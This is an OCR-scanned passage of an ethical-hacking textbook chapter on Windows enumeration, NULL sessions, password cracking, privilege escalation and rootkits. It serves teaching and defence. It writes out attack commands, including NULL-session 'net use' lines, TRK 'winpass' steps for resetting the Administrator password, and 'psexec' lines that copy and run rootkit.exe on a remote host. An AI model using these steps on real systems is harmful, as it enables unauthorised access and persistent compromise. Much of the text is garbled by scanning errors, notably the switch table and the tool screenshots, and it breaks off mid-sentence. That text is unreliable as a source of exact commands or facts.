sions to users who are mem hers of the same group(s) eis the creator of a file or a directory.

• Creator Owner — The person who created the rile or the directory is a member of this
group. Windows 2(JfJ(i uses ihis group Lo a l a : j m a 1 iciiUy iinmi access permissions

to the creator of a file or directory.

Everyone — Ail interactive, network, dial-up, and authenticated users are members
of this group. This group is used to give wide access to a system resource.

Interactive — Any user logged on to the local system has the Interactive identity,
which allows only locai users to access a resource.

• Network — Any user accessing the system through a network has the Network
identity, which allows only remote users to access a resource.
• Restricted — Users and computers with restricted capabilities have the Restricted
identity. On a member server or workstation, a local user who is a member of the
Users group {rather than the Power Users group) has this identity.

• Self — Refers lo the object itself and allows the object to modify itself

• Service — Any service accessing the system has the Service identity, which grants
access lo processes being run by Window’s 2000 services.
• System — The Windows 2000 operating system has the System identity, which
is used when the operating system needs to perform a system-level function,

• Terminal Server User — Allows terminal server users to access terminal server
applications and to perform other necessary tasks with terminal services

So u rce ihttpi/f technet . m krosoft com I en- u h b ra ry fhb/26 9 H 2 . asp x

“Si

3 ft

in-

security identifiers

Each user account in Windows has a unique II) assigned to it commonly know r n
as a security identifier (SID) that is used to identify the account or group. The SID is
a combination of characters that looks like the following:

S-l-5-52-1045 537234-129247C)S99 3o6S^27f>719-190(K)

Why All the Codes?

SIDs may not sound like a good idea, but you need to look at why they are being used instead
of the actual usernames. For a moment consider usernames and SIDs to be like a person and
his or her phone number, if you were to go to any city in the world, you would find multiple
people with the same first name, but it is unlikely that those people would share the same
phone number. In Windows, once a SID is used it is never reused, meaning that even rf the
user name is the same, Windows doesn’t treat it as the same. By using this setup, an attacker
cannot gain access to your files or resources simply by naming their account the same as yours.

164 PART 2 A Technical Overview of Hacking

Even though you may use a usernauie to Eiccess the system, Windows identities each
user. group, or object by the SID. Tor example. Windows uses the SID to Look up a user
account and see whether a password matches. Also, SIDs are used in every situ tit ion
in which permissions need to be checked, for exam pie, when a user attempts to access
folder or shared resource to determine whether that user is allowed to access it.

Commonly Attacked and Exploited Services

The Windows OS exposes a tremendous number of services, each of which can be exploited
in some way by an attacker. Each service that runs on a system is designed to offer extra
features and capabilities to a system and, as such. Windows has a lot of basic services
running by default which are supplemented by the ones applications themselves install.

Although there are a 11 urn her of services running in Windows, one of the most
commonly targeted ones is the NetBIOS service, ivhich uses User Datagram Protocol
(UDPj ports 137 and 138 and Transmission Control Protocol (TCP) port 139.

NetBIOS litis long been i\ target for al lackers duu Lu it > ease
of exploitation and the fact that it is commonly enabled on
Windows systems even when it is not needed. NetBIOS was
designed to facilitate communications between applications
in local area net work but is now considered to be a legacy
service and usually can be disabled.

In the Windows OS, the NetBIOS service can be used by an
a tt ticker to discover information about a system. Information
that can be obtained via the service is very diverse and includes
user na 111 es h share names* service information, among other
things. In the enumeration phase, we will see how r to obtain
this information using something known as a NULL session.

Once port scanning has been performed, it is time to dig deeper into the target system
itself to determine what specifically is available. Enumeration represents a more
aggressive step in the hacking and penetration testing process because the attacker has
now started to access the system to see specifically what is available. All the steps lead i tig
up to this point have been aimed at gaining information about the target to discover
the vulnerabilities that exist and how the network is configured, When enumeration
is performed, the process is now at temp Ling to discover what is offered by these services
for later usage in actual system hacking.

When performing enumeration, the attacker has the goal of uncovering specific
information about the system itself. During a typical enumeration process an attacker
will make active connections to the target system to discover items such as user accounts,
share names, groups, and other information that may be available via the services
discovered previously. It is not uncommon during this phase of the attack to confirm

NOTE

In reality, any service can be a
potential target; it all depends
on the knowledge and skill of
the attacker. However, some
services are much more Itkely
to be attacked than others,
and NetBIOS fits the profile
of a service that is commonly
selected for attack.

Enumeration

CHAPTER7 En time ration and C omputer System Hacking

165

Is it Legal?

A case can be made that enumeration represents the point at which hacking really starts,
beca use the target is now being actively accessed. The steps leading up to enumeration
have different levels of interaction with the target, but none of them seeks to actively
extract information from the target as enumeration does. Enumeration has gone beyond
actively probing a target to see what operating system it may be running to determining
specific configuration details.

Enumeration can be said to be the point where the line has been crossed, with the
activities from this point on becoming illegal.

information that was discovered earlier information that the intended target may have
even made publicly available such as Domain Name System (DNS) settings. During
this process, however, new details will emerge that the victim did not make available;
otherwise, details that tend to appear at this point include the following:

• User accounts
t]roup sel i in

■ Group membership

• Application settings
• Service banners
Audit settings

• Other service settings

• NULL Session

The NULL session is a feature in the Windows operating system that is used to give
access to certain types of information across the network. NULL sessions are a feature
that has been a part of Windows lor some time — one that is used to gain access to parts
of the system in ways which are both useful and insecure.

A NULL session occurs when a user attempts a connection to a Windows system
without the standard user name and password being provided. This connection type
cannot be made to any Windows share, but ii can be made to a feature known as

J

In addition to determining what services and settings are present,
the enumeration ph. els e also can employ techniques used to
determine the placement and capabilities of countermeasures.
An attacker can use enumeration methods to get a picture of
whether or how a target can respond to system hacking activities.
By uncovering information on whether or how a defender can
respond will allow the attacker to modify their attack accordingly
lo make their activity more productive.

attacker can gather, the more
accurate the attack can be.
With enough information
about a target, an attacker can
move from a “shotgun ” style
attack to an attack similar to
what a sniper would carry out.

166 PART 2 A Technical Overview of Hacking

the Interprocess Communication (IPC) administrative share. In normal practice,
NULL sessions Eire designed to facilitate connection between systems on a network to
allow one system to enumerate the process and shares on another I -sing a NULL session
it is possible to obtain information such eis the following:

• List of users and groups
• List of machines
■ List of shares

• Users and host SIDs

• The NULL session allows access to a system using a special account known as a NULL
use]’ that can be used to reveai information tibout system shares or user accounts white
not requiring a use ma me or password to do so,

Exploiting a NULL session is a simple task that requires only a short list of commands.
For example, assume that a computer has the name “‘ninja 1 ‘ as the host name, which
would mean that the system could be attached to using the following, where host is
the Internet Protocol (IP) address or name of the system being targeted.:

net use \ninja\ipc$M ” /user:”” To view the shared folders on the system the following command can be used: Net view Wninja If shared resources are available, they will be displayed as a list, at which point the attacker can attach to a shared resource as follows: Net use s: \ninja(shaied folder name) At this point, the attacker can browse the contents of the shared folder and see what data is present. f > NOTE NULL sessions may sound like a bad idea, but they are very handy when used properly. In practice, the Windows operating system has given broad powers to this account that are not needed to use the account for its intended function. As a security professional, being vigilant about how the sessions are used will help in securing them. Oversharing? Remember that on the Windows operating system shared folders give access to the Everyone group by default. If the Everyone group is given default access to a folder and this is not changed, it creates a situation in which attackers can easily browse the contents of the folder because they will be part of the Everyone group by default. Prior to Windows 2003, the Everyone group was granted full controls of a folder. From Windows 2003 on, the Everyone group is given read-only access, in either situation, it is possible for an attacker to at least view the contents of a folder, and in the case of full control, do much worse. CHAPTER? Enurne ration a nd Computer System Hacking 167 TABLE 7-2 Partial list of nbtstat switches. SWITCH NAME FUNCTION ■-a R”p1″i irnQ thp Mp^RIO – ^ n pi rn p i – zi h 1 p zinrl m Anrl Alrirv P.CLU 1 1 l_> L 1 1 C 1 1 tT ID 1 K_|T J I lal lit L EJ U I EI Ol IU 1 1 1 a 1 lUaLUI y access control (IVtAC) address of the address card for the computer name specified -A Adapter Status Lists the same information as -a when given the target’s IP address -c Cache Lists the contents of the NetBIOS name cache -n 1 * u 1 1 1 ET j rii^nl^w^ thp n.amp^ rpn i^tp tp H lor^illv Kv Mp+ R] n^I 1 J lay j Lf ICT 1 lu 1 1 1 CT j 1 UUIjiCI CU IULGIIV UV HC LLJI S_/ J applications such as the server and redirector _r I H o ck -1 ! Eva H Plicnlrnjc 3 f~r\i y n+ ^nt 1 1 n_rrri*>c–c rijcn K i – c< H l~iu L> 1 j jk^lcJy j a LUU.I1 L Ul all rldlfltri [trat/iVCLJ L/y broadcast or Windows Internet Name Service (WINS) server -s Sessions Lists the NetBIOS sessions table converting desti- nation IP addresses to computer NetBIOS names -S Sessions Lists the current NetBIOS sessions and their status, with the IP address t ra n Working with Nbtstat An additional tool that can be used in the enumeration process is a tool known as nbtstat. Included with every version of the Windows operating system, nbtstat is a utility intended to assist in network troubleshooting and maintenance. The utility is specifically designed to troubleshoot name resolution issues that are a result of the NetBIOS service. During normal operation, a service in Windows known as NetEIO L S over TCP/IP will resolve names known as NetBIOS names to IP addresses. Nbtstat is a command line utility designed to locate problems with this service, Nbtstat has a number of switches that can be used to perform different functions; some of the more useful functions for the ethical hacker are listed in Table 7-2. The -A switch can be used to return a list of addresses and NetBIOS mimes ihe system has resolved. The command tine that uses this option would look like the following if the targeted system had an IP address of 192, 16 8,1, 1; nbtstat -A 192. 1GS. 1 . 1 SuperScan SuperScan is a tool that was used back in Chapter h to perform port scanning, but can also perform enumeration. On Lop ol SuperSeaji’s previously mentioned a Minks to scan TCP and 1 1 DP ports h perform ping scans, run whois and tracert it also has a formidable suite of features designed to query a system and return useful information. 1 68 PART 2 A Technical Overview of Hacking IP FIGURE 7-t SuperS can. SuperSenn offers a number oJ useful enumeration ul ilit ies dusiLUU’d lor eunu’lmii information from a Windows-based host: • NetBiOS Name Table • MILL session • MAC addresses • Workstation type • Users • Groups • Remote procedure call I RFC) endpoint dump • Account policies • Shares • Domains • Logon sessions • Trusted domains • Services • Each of these features can extract information from a system that can he useful in later stages of the hacking process, CHAPTER7 En time ration and C omputer System Hacking 169 SIMScan SNScan is a utility designed to deled Simple Network Management Protocol (SNMP)- e nab led devices on a network. The utility is designed to locate and identify devices that are vulnerable to SNMP attacks. SNScan scans specific ports (for example. IJDP 161, 193. 391. and 199 3) and looks for the use of standard (public and private) and user-defined SNMP community names. User-defined community names may be used to more effectively evaluate the presence of SNMP- enabled devices in more complex networks. Enumeration is designed to gather useful information about a system: specifically what can be accessed through a discovered service. By using the process of enumeration, an attacker can obtain information that may not otherwise be available such as user names, share names, and other details, Enumeration represents the point at which the attack crosses the legal line to being an illegal activity in some areas. System Hacking After an attacker has performed enumeration, he or she can begin attacking the system. Enumeration has provided details that are actionable for the next phase of system hacking, including details of user accounts and groups. The information on usernames and groups provides points on the target system on which to concentrate the system hacking activities. Up to this point, progressively more detailed information has been gathered and what those services are offering has been determined: now the process of exploiting what has been uncovered can begin. During the enumeration phase, among the detailed information that was acquired was usernames. The information on user accounts provides the system hacking process a point to focus on using a technique known as password cracking. Password cracking is used to obtain the credentials of an account with the intent of using the information to gain access to the system as an authorized user. To understand why password cracking is successful, think of how and why passwords are used. Passwords are designed to be something that an individual can easily remember and at the same time not be something easily guessed. Herein lies the problem. In practice, individuals wilt tend to use passwords that are easy to guess or susceptible to cracking methods such as those introduced in this section. Some examples of passwords that lend themselves to cracking include the following: • Pa ss wo rd s t h at use on ly n u m bers • Pa ss wo rds th at use on ly le tters • Passwords that are only upper- or lowercase • Passwords that use proper names • • Pa ss wo rd s t h at u se d ictio n ary wo rd s • Short passwords (fewer than eight characters) Passwords that adhere closely to any of the points on this list lend themselves to quick and easy password cracking methods. Passwords that avoid any of these points tend to be less easy to crack, but not impossible, as the techniques discussed in this section will demonstrate. 170 PART 2 A Technical Overview of Hacking Types of Password Cracking Despite what is seen in movies, TV shows, and other media, password cracking isn’t as simple as a hacker sitting in front of a computer running some software and breaking the password. It is much more involved. Password cracking can take one of four forms, all designed to obtain a password that the attacker is not authorized to possess. The following are the four password cracking methods that can be utilized by an attacker: • Passive online attacks • Active online attacks • Online tit tacks • Nontechnical attacks • Each one of these attacks offers a way of obtaining a pas sword from an unsuspecting party in a different but effective way. Passive Online Attacks In passive online attacks, an attacker obtains a password simply by listening for it. This attack can be carried out using two methods: packet sniffing, or man-in-the-middle and replay attacks. These types of attacks are successful if the attacker is willing to be patient and employ the right techn ique in the correct environment. Using a packet sniffer is effective, but it can be thwarted by technology that prevents the observation of network I r el Hie. Sped lie ally, packet sniffing will work only if the hosts are on the same collision domain. This is a condition that exists If a hub is used to join the network hosts together: if a switch, bridge, or other type of device is used, the attack will fail. Other types of passive online attacks utilize a man-in-the-middle or replay attack to capture the password of the target. If a man-in-the-middle attack is used, the attacker must capture traffic from both ends of the communication between two hosts with the intention of capturing and altering the traffic in transit. In a replay attack, the process consists of an attacker capturing traffic using a sniffer, using some process to extract the desired information [in this case, the password), and then using or replaying it later to gain access to a resource. While a packet sniffer may have limited success when trying to capture passwords on most networks, companies do tend to frown upon their use by unauthorized individuals. An individual that runs a packet sniffer on a corporate network has a possibility of capturing a password, not to mention other confidential information. It is for these reasons that companies tend to take a very tough stance on their usage, and in some cases have terminated employment of individuals caught using them on the network without permission. 3 CHAPTER7 En time ration and C omputer System Hacking 171 Dictionary attacks are Successful when users are allowed to choose passwords without any restrictions being placed upon them. Evidence has shown that individuals will choose passwords that are common names or words if allowed to do so, and it is in these cases that dictionary attacks thrive. The enforcement of complex passwords that introduce upper- and lowercase letters as well as numbers and special characters tends to limit the success of dictionary attacks. Active Online Attacks The next form of attack is known as tin active online attack, which consists of more aggressive method?; such as brute- force and dictionary attacks, Active online attacks are effective in situations in which the target system has weak or poorly chosen passwords in use. In such cases, active online attacks can crack passwords very quickly. The first type of active online attack is the brute -force attEick, which is unsophisticated but can be very effective in the right situation. In this type of attack, all possible combinations of characters are tried until the correct combination is discovered. Given enough time, this type of attack will be successful 100 percent of the time; however, that is also part of the problem — having enough time, A dictionary attack shares some traits with the brute-force attack. Whereas a brute-force attack attempts all combinations of characters, the dictionary attack tries passwords that are pulled from a predefined list of words. Dictionary attacks are particularly successful in situations in which the passwords in use on a system have been chosen or can be chosen from common words. This type of attack is successful even if the password is a reversed form of a dictionary word, changes certain characters, or even uses tactics such as appending digits to the end of the word. These types of attacks are easy to carry out by an attacker largely due to the availability of the components to perform them, such as password crackers and predefined word lists that can be downloaded and used immediately. Offline Attacks Offline al lacks are a form of password attack that relies on weaknesses in how passwords are stored on a system. The previous attack types attempted to gain access to a password by capturing it or trying to break it directly: offline attacks go after passwords where they happen to be stored on a system. On most systems, a list of usernames and passwords is stored in some location: if these lists are stored in a plaintext or unencrypted format, an attacker can read the file and gain the credentials. If the list is encrypted or protected, the question becomes “‘How is it protected?” If the list is using weak encryption methods, it can still be vulnerable. NOTE Brute-force attacks, although effective, are thwarted by preventive techniques such as policies that lock user accounts when a password Is entered incorrectly a preset number of times. When policies are in effect that limit unsuccessful logon attempts before locking an account, the effectiveness of a brute-force attack is diminished. 172 PART 2 A Technical Overview of Hacking A Look at Password Hashing Passwords used to grant access to a system are generally stored in a database on a system in which they can be accessed to validate the identity of a user. Due to its very nature, a database can store quite a number of passwords, each providing the ability to grant some sort of access to the system, so the confidentiality and integrity of these items must be preserved. Twrs ways to protect these valuable credentials are encryption and hashing. Encryption provides a barrier against unauthorized disclosure, while hashing ensures the integrity of these credentials.. When users attempt to log on to the system, they provide their credentials in the form of user name and password, but the password is hashed. Because the database on the system already has a hashed form of the user’s password on file, a comparison is made. If the comparison between what the user provides and what is on file matches, the use is authenticated; if not, they are denied access. While the hashing method is known to both parties and can be discovered with some work by an attacker, it does not tell them what a password is because they would still have to reverse the hash {which is designed to be infeasible). However, the attacker can apply the same hashing function to different character combinations in an attempt to reveal an identical hash. The rate at which this can be performed varies depending largely on the hashing function used, but in some cases this process can be performed quite rapidly — which can allow the plaintext password to be recovered easily. The process discussed in this section relies on this process to recover passwords. Four types of offline attacks are available to the attacker, each offering a method that can be used to obtEiin passwords from a target system. The types of oflline attacks available include the two mentioned previously (dictionary and brute-force attacks), and ei I so hybrid and precnmputed attacks. Examples of password crackers in this category include: Cain and Abel — lias the ability to crack password hashes offline. Works with Windows, Cisco , VNS> and other similar passwords. John the Ripper — Cracks UNIX and Windows passwords • Pandora — Designed to crack Novell passwords Pwdump3 — Extracts passwords from the .SAM database Dictionary Attacks Dictionary attacks are similar to active online attacks in that all possible combinations are tried until the correct combination is discovered. The difference between this type of attack and the active online version is how the correct combination is uncovered. In this method, an att ticker reEids the list of passwords looking for hashes that match CHAPTER 7 En time ration and C omputer System Hacking 173 A method of thwarting hashes that is used by many systems such as UNIX is a technique known as salting. When you use salting, you add extra characters to a password prior to hashing. This has the effect of changing the hash, but not the password. Attackers who recovers the list of hashes from the system will have a much harder time recovering the passwords because they would have to determine the password by reversing the hash or determining the text used to generate it. the hashed values of words in the dictionary. If the attacker finds a match between the hashed values on the system and the hashed values from a dictionary or word list, he or she has found the correct password. Hybrid Attacks Hybrid attacks are another form of offline a I tack that functions much like die I in nary attacks, but with an extra level of sophistication. I [ybrid attacks start out like a dictionary attack > in which different combinations of words from the dictionary are attempted: if this is unsuccessful at uncovering the password, the process changes. In the next phase of the attack, characters and symbols are added to the combinations of characters to □it tempt to reveal the password. The attack is designed to be fast and thwart the incorrect or improper use of salting. Brute- Force Attacks Brute-force attacks function like online attacks because they attempt all possible combinations or a suspected subset of possible passwords. Brute force has the benefit of always working, but the downside is that it takes a long time. Typically* this method starts using simple combinations of characters and then increases com plexity until the password is revealed. Examples of brute- force password crackers include: • Opcrack • Proactive Password Auditor (ZZZD- Given enough time (possibly years’), brute-force attacks will succeed, but the issue becomes whether the attackers have enough time before they are detected. Brute-force methods of any type can take substantial periods of time depending on the complexity of the password, password length, and processor power of the system attempting the break in. Attackers run the risk that if they take too long to break a password, they will be detected by the system owner, at which point the attack will have failed. 174 PART 2 A Technical Overview of Hacking Precompiled Hashes P recomputed hashes Eire used in an attack type known as a rainbow table. Rainbow tables compute every possible combination of characters prior to capturing a password. Once all the passwords have been generated, the attacker can then capture the password hash from the network and compare it with ihe hashes that have already been generated. With all the hashes generated ahead of time, it becomes a simple matter to compare the captured hash to the ones generated, typically revealing ihe password within a few moments. Of course, there’s no getting something for nothing, and the case of rainbow tables is no exception. The downside of rainbow tables is that they take time. It takes a substantial period of time sometimes days, to compute all the hash combinations ahead of time, Another downside of rainbow tables is the lack of ability to crack passwords of tin limited length because generating passwords of inereEising length lakes increasing amounts of time. Examples of password crackers that use rainbow tables include: • Opcrack • RainbowCrack • Nontechnical Attacks The last of the password cracking methods is a family of techniques that obtain passwords using nontechnical methods. In some cases, an attacker may choose to use nontechnical methods due to the conditions in the environment or just because it is easier. The nontech- nical methods represent a change over previous attEicks; where previous attacks relied on attacking the technology, nontechnical methods go after the human who uses the system. In the right hands, nontechnical methods can be as effective as technical methods at obtaining passwords. Shoulder Surfing Shoulder surfing is a method of obtaining a password by observing people entering their password. In this attack, the individual wanting to gain access to the password takes a position to see what a user is typing or what is appearing onscreen. Additionally, the Eittacker may also look for clues in the user’s movements that suggest they are looking up a password such as on a Post-It note or other location. To deter this attack, use the privacy screen that can be put onscreen and always pay attention to your surroundings to see whether anyone is w r atching. NOTE Rainbow tables are an effective method of revealing passwords, but the effectiveness of the method can be diminished through salting. Salting is used in Linux, UNIX, and BSD r but is not used in some of the older Windows authentication mechanisms such as LM and NTLM. CHAPTER 7 En time ration and C omputer System Hacking 175 Keyboard Sniffing Keyboard snifling intercepts the password as a user is entering it This attack can be carried out when users are the victims of keylogging software or if they regularly log onto systems remotely without using any protection. Social Engineering Social engineering methods can be used to obtain a password based on trust or ignorance on the user’s end. Tor example, a password may be obtained by an attacker calling an individual, pretending to be the system administrator, and asking for the password. Social engineering is effective because users tend to be trusting: if an individual sounds or acts legitimate, the feeling is that he or she probably is. Using Password Cracking Using any of the methods discussed here with any type of password cracking software may sound easy, but there is one item to consider: whose password to crack? Going back to the enumeration phase, it was discussed that usernames could be extracted from the system using any one of a number of software packages or methods. Using these software tools, usernames were uncovered and at this point the attacker could target a specific account without the password cracking tool of choice. So which password to crack? Accounts such as the administrator account are targets of opportunity, but so are lower-level accounts such as guest that may not be as heavily defended nor even considered in security planning. Privilege Escalation If a password is cracked, the probability of the account being one that has high level access is somewhat low because these types of accounts tend to be well defended. If a lower-level account is cracked, the next step is privilege escalation: to escalate the privileges to a level at which increased access and fewer restrictions are in place such as with the administrator account. Out of Sight, Out of Mind Every operating system ships with a number of user accounts and groups already present. In Windows, users who are already configured include the administrator and guest accounts. Because it is easy for an attacker to find information on the accounts that are included with an operating system, care should be taken to ensure that such accounts are secured properly, even if they will never be used. An attacker who knows that these accounts exist on a system is more than likely to try to obtain the passwords of each. 176 PART 2 A Technical Overview of Hacking Stopping Privilege Escalation A number of methods can be used to blunt the impact of privilege escalation such as the concept known as least privilege. The thinking behind this concept is to limit the amount of access an account has to just what is needed to perform its assigned duties. For example, a user account given to someone in sales would be able to only perform the tasks required by a salesperson to do the job. It is in this way that the actions that an account can perform are limited, preventing inadvertent or accidental damage or access to resources. One way to escalate privileges is to identify an account that has the access desired and then change the password. There are several tools that offer this ability, including the following: » Active@ Password Changer • Trinity Rescue Kit • ER D Com in an de r • Recovery Console These utilities function by altering the SAM with the goal of resetting passwords and accounts to settings desired by the attacker. • Re-enable accounts • Unlock an account • Reset expiration on an account • Display all local users on a system • Reset administrator account credentials • To change a password using Active @. select a specific user account to view r the account information, as seen in Figure 7-2. To view and change permitted logon days and hours, press the [PgDn] key, as seen in Figure 7-3. The designers of Active® desig ned it to prevent the lengthy process of reinstalling operating systems when a password reset coufd be performed instead. However, as is the case with any tool, it can be used for good or bad. It all Active© Password Changer The Active® Password Changer is a utility that is used to perform multiple functions on user accounts including password resets. The utility can be used to change a password of a targeted user account to a password that the attacker chooses to set. To use this utility requires the attacker to gain physical access to a system t at which point the system can be rebooted from a universal serial bus (USB), floppy, or CD. depends on the user’s intent. Active@ has the advantage of being able not only to reset passwords, but also toj CHAPTER 7 En ume ration and C omputer System Hacking 177 flctiuefJ Password Changer u„3.fl (build BZ77 3 User’s Recount parflfieters : NS SflH Oat abuse: C6 3 (i*<UIK2K>sH]NHTsSVSTEh32^0MFIG\sftH Fu ] ! Hriw : “Kara line White” Hescrlpt inn ; “HetiJOT’k s^jfi^rhs rnrj ineer (IT BepartHent V Exist iitg : Change t n \ 13 [ 1 User Must change passuard at next logon [XI IXJ Password never expires [1 [ 1 Account Is disabled 13 II Account Is Locked uul IX] Clear this U s ur ” ^ Password PgDn to vSew oiv and c hangs per Hit tod logon hours Press V to save changes and exit cr Esc tu exit without saying 1999-2805 ( C ) Active Data Recovery Software www. password-changer, coh FIGURE 7-2 Viewing account information. Select and choose days and hours to allow logons. Account logon hours are displayed in GMT (Greenwich Mean Time}. The time will have to be adjusted for the local time zone where the system resides or for the time zone set on the system, Press [Y] to save changes or press [Esc] to leave the previous account information unchanged and return to previous window (List of accounts). See Figure 7-4, Resetting a user’s password results in the following; • The user’s password is set to blank. • The account is enabled. ■ The password will be set never to expire. FIGURE 7-3 Changing logon days and times. fictiuetf Password Chauffer u.l.B ( build B277 ) User’s Recount paraweters : NS SAM Database: ceMl><U1W2R>sH]HHTsSYSTEW32vC0HFlG\saH Pnrnltted Logon Hours (GMT) 6 1 2 3 4 5 6 7 B 9 IB 11 12 13 tl 15 IB 17 IB IS £1 7\ 7? 23 su rx/i rxi rxnxi rxtr it It JI II II 31 It It HXnxirxi rxi ixnxirxi rxi rxiExi Ho EX! IX) I It 31 )I 11 31 3t 31 3E It 31 )t It 31 )t 3t 1 1 31 11 It 31 3EX1 Tu EX3IXHX1IX3I )I II 31 II 31 31 II 31 )I II 31 )I IE JI 31 31 II 31 1EX1 He EX] IX 3 1X1 IX] I 31 II 31 ]I 31 31 ] I 31 31 II 31 )I 3E ]I 31 JI J I 31 11X1 Tli [X] EX1 1X1 IX] I II II 31 ] I 31 II ] I II 31 II 31 )I IE ]I 31 31 II 31 11X1 Fr IX] 1X3 1X3 1X3 1 31 II 31 ] I 31 31 ] I 31 )I 31 31 )I )E ]I 31 II 3t 31 11X1 Sa EX] 1X1 1X1 1X3 1 31 II 31 ] I 31 3E ] I II 31 ] I 31 )I 1 EX] IXJ IX) EX1 IX 1 IX) 1X1 PgUp to view or/and change account parameters 1999-2BB5 (C) Press V to save changes and exit cr Esc Active Data Recovery Software to sxii with uul saving www- password-changer, coh 1 78 PART 2 A Technical Overview of Hacking fictiuet* Password Changer u.J.Q [build BZ77D tlssr s Rccaunt poriweters : HS SAH Database: CD 3 ( 1 )<UlH2K>sU] HMTsSYSTEM32^C0NF IG\s*m Fill l Mane : ‘Karat I ne White Descr 1 pt Ion : “Met work systems engineer CTT iepartHeut J ” Existing: nhcmgr tn: t 1 I 1 User Must change password ai next logon EX] tXI Password never expires [ 1 [ I Ate aunt is disabled C ] [ I h. juuii! \u Luufcuil u u I ■ X Clear this User’s Password PgDn to i^icN or /and change permitted logon hours FIGURE 7-4 List of accounts. i’njss V Id sa*je changes and exit or Esc to ex i I without sauinu; liter ‘ s atlrifauEes has been succesfu I Jy changed . H’ress any km,*. J 1999-2605 <C> Act iue Data Recouero SoltHare nhh . pa ssMor d -changer, com Trinity Rescue Kit Trinity Rescue Kit (TRK) is a Linux distribution that is specifically designed to be run from a CD or flash drive. TRK was lLus i Liti Lui ii« rwuw r and repair h ot h Windows and Linux systems that were otherwise un boo table or unrecoverable. While TRK was designed for benevolent purposes, it can easily be used to escalate privileges by resetting passwords of accounts that you would not otherwise have access to. TRK can he usml to chaniie a password ny running ike target system off of a CD or flash drive and entering the TRK environment. Once in the environment, a simple sequence of commands can be executed to res el the password of an account The following steps change the password of the Administrator account on a Windows system using the TRK: 1. At the command line enter the following command: winpass -u Administrator • The winpass command will then display a message similar to the following: Searching and mounting all file system on local machine Windows NT/2K/XP installation s) found in: • 1: /hdal /Windows Make your choice or ” q 1 to quit [1]: Type 1 or the number of the location of the Windows folder if more than one install exists. NOTE The TRK can be used as a follow-on tool to the enumeration techniques discussed earlier. It works best when you know the name of the account to be changed, The enumeration techniques shown previously allow you to browse the accounts on a system and select a target account. CHAPTER 7 En time ration and C omputer System Hacking 179 1. Press Enter. • Enter the new password or accept TRK’s .suggestion to set the password to ei blank, • You will see this message; -t Do you really wish to change it?” Enter Y and press Enter, • Type in it 0 to shut down the TRK Linux system . • Reboot, • As you can see, it is possible to change the password of a specific account using TRK in a few steps. Escalating privileges gives the attacker the ability to perform actions on the system with fewer restrictions and perform tasks that are potentially more damaging. If an altacker gains higher privileges than he or she would have otherwise, it is possible to run applications, perform certain operations, and engage in other actions that have a bigger impact on the system. Planting Backdoors The next step after escalating privileges is to place backdoors on the system so you can come back later and take control of the system repeatedly. An attacker who places a backdoor on a system can use it for all sorts of reasons, depending on specific goals, Some of the reasons for planting backdoors include the following: • Placing a rootkit ■ Executing a Trojan Of course, the question is how to get a backdoor on a system, With the escalated privileges obtained earlier, you have the power to run an application on a system and do so more freely than you would without such privileges. If the privileges obtained previously were administrator (or equivalent), you now have few if any limitations, which means that you can install a backdoor quite easily. To start the process, you must first run an tip plication remotely. Several tools are available, but for this discussion you will use some of the components of a suite of tools known as PsTools, 1 FYI h PsTools is a suite of tools designed by Mark Rjssinovich of Microsoft. The PsTools suite was originally designed for Windows NT systems, but has Continued to serve a useful purpose in later versions. PsTools contains applications designed to do everything from running commands remotely to terminating processes, as well as a number of other functions. All the applications that make up the PsTools suite are command line-based and offer the ability to be customized by the use of switches. 180 PA RT 2 A Tech n i ca I Overview of H ack i n g Using PsTools The PsTooIs suite includes a mixed bag of utilities designed to ease system administration. Among these tools is PsExec. which is designed to run commands interactively or nonin- teractively on a remote system. Initially, the tool may seem similar I o Telnet or remote desktop, but does not require installation on the local or remote system in order to work. PsExec need only be copied to a folder on the local system and run with the appropriate switches to work. Let’s take a look at some of the commands that can be used with PsExec: • The fol low i n g c o m mand la un c h es a n internet] ve c i ) m m a n d prom pt on a system named Wzelda: psexec Wzelda cmd • This command executes IpConfig on the remote system with the /all switch , and displays the resulting output locally: psexec Wzelda ipconfig /all » This command copies the program rootkit.exe to the remote system and executes it interactively: psexec Wzelda – c rootkit.exe • This command copies the program rootkit.exe to the remote system and executes it interactively using the administrator account on the remote system: psexec Wzelda -u administrator -c rootkit.exe As these commands illustrate, it is possible for an attacker to run an application on a remote system quite easily The next step is for the attacker to decide just what to do or what to run on the remote system. Some of the common choices are Trojans, rootkits. or backdoors. Rootkits A rootkit Is piece of software designed to perform some very powerful and unique tasks to a target system. This software is designed to alter system iiles and utilities on a victim’s system with the intention of changing the way a system behaves. Additionally, a rootkit quite commonly has the capability to hide itself from detection, which makes the device quite dangerous. A rootkit is beneficial to an attacker for a number of reasons, but the biggest benefit is the scope of access the attacker can gain. With a rootkit installed on a system, attackers gain root access to a system, which means that they now have the highest level of access possible on the target system. Once attackers have a rootkit installed, they effectively own the system and can get it to do whatever they want. In fact, a rootkit can be embedded into a system so deeply and with such high levels of access that even the system admin- istrator will be unable to detect its presence. I laving root access to a system allows an attacker to do any of the following: CHAPTER7 En time ration and C omputer System Hacking 181 Sony’s Rootkit Problem One of the more famous rootklts was produced by Sony BMG in 2005 as a way to enforce Digital Rights Management (DRMJ on its music. The software was shipped on the CDs of some of Sony’s popular artists. When the CD was placed into a computer using Microsoft Windows, the software would install on the system and prevent copying of music. The biggest downside to this software was that it had no protection, so an attacker who knew the software was present or knew how to scan for it could connect to and take control of a victim’s system. This rootkit case had a lot of fallout for Sony and the computing public at large. Sony was embarrassed by the publicity and ultimately was on the losing side of a class action lawsuit. Additionally,, as a result of this problem, the public became aware of the threat of rootkit and learned to be more cautious. Sony’s rootkit episode also attracted hackers to write new worms designed to pounce on the vulnerabilities that the rootkit induced on a system. Installing a virus at any point — If the virus requires root Level access to modify system liles, or alter and corrupt data or files, a root kit can provide the means to do so Placing a Trojan on a system — Much like viruses, a Trojan may require root level access, so a rootkit will provide the level of etc cess needed to run these types of malware. Installing spyware to track activity — Spy ware typically lu^ds to be well placed and well hidden. A rootkit can provide a way to hide spyware such as a key logger so it is undetectable even to those looking for it. Hiding the attack — A rootkit possesses the ability to alter the behavior of a system any way an attacker wants, so it can be used to hide evidence of an attack. A rootkit can be used to hide files and processes from view by altering system commands to prevent the display or detection of the attEick. • Maintaining access over the long term — If a rootkit can stay undetected, it is easy for an attacker to maintain access to the system. For an attacker* the challenge is to construct a rootkit to prevent detection by the owner of the system. • Monitoring network traffic — A rootkit can install a network sniffer on a system to gain inside in form tit ion about the activities on a network. Blocking the logging of selected events — To prevent detection, a rootkit can atter the system to prevent the logging of activities related to a rootkit Redirecting output — A rootkit can be configured to redirect output of commands and other activities to another system. NOTE Rootkits are dangerous because once a system has become ‘.he victim of a 